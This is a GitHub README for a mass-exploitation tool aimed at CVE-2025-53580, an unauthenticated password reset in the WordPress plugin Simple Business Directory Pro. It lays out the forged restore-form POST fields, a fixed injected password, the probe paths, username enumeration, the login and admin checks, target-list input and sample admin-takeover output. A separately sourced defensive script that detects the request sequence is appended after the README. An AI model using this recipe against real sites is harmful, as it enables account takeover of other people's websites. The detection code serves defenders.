Nxploited/CVE-2025-53580

GitHub: Nxploited/CVE-2025-53580

Identifies and exploits the unauthenticated password-reset vulnerability in WordPress Simple Business Directory Pro to achieve administrator takeover without credentials.

Stars: 0 | Forks: 0

# CVE-2025-53580: WordPress Simple Business Directory Pro plugin < 15.6.9 high-priority privilege escalation vulnerability

### Simple Business Directory Pro: Incorrect Privilege Assignment → Password Reset → Admin Takeover

![CVE](https://img.shields.io/badge/CVE-2025--53580-critical?style=flat-square&color=8B0000) ![Plugin](https://img.shields.io/badge/Simple%20Business%20Directory%20Pro%20%3C%2015.6.9-555?style=flat-square) ![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square) ![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python) ![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square)

## ❶ Vulnerability information

| Field | Details |
|---|---|
| **CVE** | CVE-2025-53580 |
| **Plugin** | quantumcloud Simple Business Directory Pro (`simple-business-directory-pro`) |
| **Affected versions** | All versions **< 15.6.9** |
| **Authentication required** | **None** |
| **Vulnerability type** | Incorrect privilege assignment → unauthenticated password reset |
| **CWE** | CWE-266 · Incorrect Privilege Assignment |

**Root cause:** the plugin exposes a front-end password-recovery form (`qcpd-restore-pwd`) that accepts a numeric `qcpd-uid` (the WordPress user ID) and a new `pass` value. No authentication, token, nonce or e-mail verification is enforced before the password is changed. An unauthenticated attacker can therefore reset the password of **user ID 1** (usually the site administrator) and of other users, then log in with the injected password and obtain full administrator privileges.

## ❷ Attack flow

```
1. Discover SBD restore page
   Probe 24 candidate paths → match body containing "sbd"

2. Reset passwords by user ID
   POST
     qcpd-restore-pwd      = restore
     qcpd-restore-pwd-type = user
     qcpd-uid              = 1 (then 2, then 3)
     pass                  = NxploitedNX

3. Enumerate usernames
   /?author=1..9            → redirect / body parse
   /wp-json/wp/v2/users     → slug / username fields
   hostname heuristic + "admin" fallback

4. Login with injected password
   POST /wp-login.php log= pwd=NxploitedNX
   Check: wordpress_logged_in cookie present

5. Verify admin access (dual method)
   GET /wp-json/wp/v2/users/me → capabilities.manage_options
   GET /wp-admin/users.php     → adminmenu / users table

6. Write confirmed hit → Nx_sbd_login_hits.txt
```

## ❸ Setup

```
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt
```

**`requirements.txt`**

```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```

## ❹ Usage

```
python3 CVE-2025-53580.py
```

### Prompts

```
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Successful hits file [Nx_sbd_login_hits.txt]: Nx_sbd_login_hits.txt
```

## ❺ Target format: `list.txt`

```
https://target1.com
target2.com
http://target3.com
```

## ❻ Candidate SBD pages probed

The tool scans **24 paths** on each target, looking for a page whose content contains `sbd`:

```
/login
/log-in
/signin
/sign-in
/user-login
/account/login
/restore
/password-reset
/reset-password
/lost-password
/lostpassword
/user/restore
/my-account
/members/login
/member-login
/customer-login
/wp-login.php
/blog/login
/auth/login
/auth/restore
/sbd-login
/sbd-restore
/blog/log-in
/account/log-in
```

## ❼ Username enumeration

| Method | Endpoint |
|---|---|
| Author redirect | `/?author=1` → `/?author=9` |
| REST API | `/wp-json/wp/v2/users` → `slug` + `username` |
| Hostname heuristic | first label of the domain name |
| Hard-coded fallback | always includes `admin` |

## ❽ Admin verification: dual method

Every successful login is verified by two independent checks before it is written to disk:

**Method 1 (REST API):**

```
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true
→ ADMIN CONFIRMED
```

**Method 2 (dashboard):**

```
GET /wp-admin/users.php
→ adminmenu / users table markers present
→ ADMIN CONFIRMED
```

## ❾ Output file

**`Nx_sbd_login_hits.txt`**

```
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin - login=/wp-login.php user=admin pass=NxploitedNX - detail=ADMIN_CONFIRMED_REST(manage_options)
[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor - login=/wp-login.php user=editor pass=NxploitedNX - detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)
```

## ❿ Terminal output example

```
[info] https://target.com :: starting
[ok] https://target.com :: found front-end sbd page at https://target.com/my-account
[info] https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info] https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: extracting usernames and trying login
[ok] https://target.com :: login OK for user='admin', checking admin...
[ok] https://target.com :: HIT for user='admin' → admin=True, detail=ADMIN_CONFIRMED_REST(manage_options)
[warn] https://target2.com :: no sbd page found in candidate restore paths, skipping
```

## ⓫ Author

```
Nxploited (Khaled Alenazi)
GitHub   → https://github.com/Nxploited
Telegram → @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited) [![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

## ⓬ Disclaimer

```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems the operator
does not own or have explicit written permission to test.
Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
```

© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · fixed in 15.6.9
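The request sequence laid out in the attack-flow and admin-verification sections above (restore-form POSTs, `/?author=N` and `/wp-json/wp/v2/users` enumeration, a `wp-login.php` POST, then an admin check) is also what a site owner can hunt for while rolling out the 15.6.9 update. The following Python script is an added example for defenders, not code from the Nxploited repository or from the plugin: it correlates web-server access-log lines per client IP for that sequence and, separately, recognises the exploit-shaped form body at a reverse proxy that can see POST bodies. The log lines, IP addresses, timestamps and the ten-minute correlation window are constructed assumptions, and the candidate path list is taken from the README above.

```python
"""Defensive detection for the CVE-2025-53580 exploitation pattern.

Added example; not part of the Nxploited tool or the plugin.  Sample log
lines and request bodies below are constructed, not captured traffic.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Candidate SBD restore/login pages from the README's probe list.  /wp-login.php is
# left out here because POSTs to it are ordinary logins (tracked separately below).
SBD_CANDIDATE_PATHS = {
    "/login", "/log-in", "/signin", "/sign-in", "/user-login", "/account/login",
    "/restore", "/password-reset", "/reset-password", "/lost-password",
    "/lostpassword", "/user/restore", "/my-account", "/members/login",
    "/member-login", "/customer-login", "/blog/login", "/auth/login",
    "/auth/restore", "/sbd-login", "/sbd-restore", "/blog/log-in",
    "/account/log-in",
}

# Combined log format: ip ident user [ts] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
WINDOW = timedelta(minutes=10)  # assumed correlation window


def classify(method, target):
    """Map one request to the attack-flow step it resembles, or None."""
    path, _, query = target.partition("?")
    path = path.rstrip("/") or "/"
    if method == "POST" and path in SBD_CANDIDATE_PATHS:
        return "restore_post"          # step 2: restore-form submission
    if path == "/" and re.fullmatch(r"author=\d+", query):
        return "author_enum"           # step 3: author-ID enumeration
    if path == "/wp-json/wp/v2/users":
        return "rest_users"            # step 3: REST user listing
    if method == "POST" and path == "/wp-login.php":
        return "login_post"            # step 4: login with the injected password
    if path in ("/wp-json/wp/v2/users/me", "/wp-admin/users.php"):
        return "admin_check"           # step 5: admin verification
    return None


def correlate_access_log(lines, window=WINDOW):
    """Return {ip: sorted indicator names} for clients that POSTed to an SBD page
    and, within `window` of that POST, both enumerated users and tried wp-login.php.
    A single indicator on its own is never reported."""
    events = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                   # not combined format; skip silently
        kind = classify(m["method"], m["target"])
        if kind:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events[m["ip"]].append((ts, kind))
    hits = {}
    for ip, evs in events.items():
        restore_times = [t for t, k in evs if k == "restore_post"]
        if not restore_times:
            continue
        first = min(restore_times)
        kinds = {k for t, k in evs if abs(t - first) <= window}
        if {"author_enum", "rest_users"} & kinds and "login_post" in kinds:
            hits[ip] = sorted(kinds)
    return hits


def is_forged_restore_request(method, body):
    """Proxy/WAF-side check on a form body: a restore submission that names a
    numeric target user ID together with a new password is the shape the README
    describes.  Returns the targeted user ID, or None if the body does not match."""
    if method != "POST":
        return None
    form = parse_qs(body)
    if form.get("qcpd-restore-pwd") != ["restore"] or "pass" not in form:
        return None
    uid = form.get("qcpd-uid", [""])[0]
    return int(uid) if uid.isdigit() else None


# Constructed sample: one client walking the full sequence, one ordinary login.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [01/Jun/2025:14:20:01 +0000] "GET /my-account HTTP/1.1" 200 8123 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:02 +0000] "POST /my-account/ HTTP/1.1" 302 0 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:03 +0000] "POST /my-account/ HTTP/1.1" 302 0 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:05 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:06 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:08 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [01/Jun/2025:14:20:09 +0000] "GET /wp-json/wp/v2/users/me HTTP/1.1" 200 900 "-" "python-requests/2.31.0"',
    '198.51.100.4 - - [01/Jun/2025:14:25:00 +0000] "GET /my-account HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jun/2025:14:25:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, indicators in correlate_access_log(SAMPLE_ACCESS_LOG).items():
        print(f"[alert] {ip}: {', '.join(indicators)}")
```

Access logs do not carry POST bodies, which is why the log correlation keys on the sequence of requests rather than on the `qcpd-uid` parameter; `is_forged_restore_request` is meant for a proxy or WAF layer that does see the body. Both are stop-gap signals: the fix is the plugin update to 15.6.9, and any site that shows the full sequence should have its administrator passwords rotated and active sessions invalidated.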